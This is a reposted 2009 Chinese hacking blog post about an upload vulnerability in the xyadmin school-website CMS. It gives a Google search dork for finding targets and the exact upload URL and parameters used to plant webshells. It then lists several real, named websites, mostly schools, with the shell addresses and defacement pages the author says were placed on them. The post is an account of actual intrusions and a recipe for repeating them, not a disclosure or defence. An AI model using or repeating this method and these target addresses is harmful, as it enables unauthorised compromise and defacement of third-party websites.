由校园网CMS系统(xyadmin)上传漏洞想到的 2009-09-27 04:27 校园网CMS系统(xyadmin)上传漏洞 google关键字:inurl:xyadmin 我们的工具还是g.cn google hack 我们随便点一个连接看看 这个是上传页面xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg 传马拿shell xyadmin是校园的缩写 那么其他的如xxadmin可否呢? http://rnx.tjuci.edu.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg window.opener.document.baseinfoform.logol.value='xyadmin/baseinfo/sam美化实用免杀大马.asp' window.alert("文件上传成功!请不要修改生成的链接地址!"); window.close(); http://www.dslsxx.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg shell地址http://www.dslsxx.cn/xyadmin/baseinfo/conn.asp 黑页http://www.dslsxx.cn/conn.asp http://www.hnaues.com/sutuo/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg 遇到 window.alert("文件上传成功!请不要修改生成的链接地址!"); window.close(); 找不到路径~~~ http://jpkc.aqvtc.cn:8081/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg window.opener.document.baseinfoform.logol.value= 'xyadmin/baseinfo/conn.asa' window.alert("文件上传成功!请不要修改生成的链接地址!"); window.close(); http://jpkc.aqvtc.cn:8081这个网站 http://jpkc.aqvtc.cn:8081/xyadmin/baseinfo/conn.asa 黑页http://jpkc.aqvtc.cn:8081/conn.asp http://www.hssxfl.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg http://www.lbkjb.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg window.opener.document.baseinfoform.logol.value= 'xyadmin/baseinfo/conn.asa' window.alert("文件上传成功!请不要修改生成的链接地址!"); window.close(); shell地址http://www.lbkjb.com/xyadmin/baseinfo/conn.asa 黑页地址http://www.lbkjb.com/EDW.asp 转载于:https://www.cnblogs.com/94YY/archive/2011/05/28/2060455.html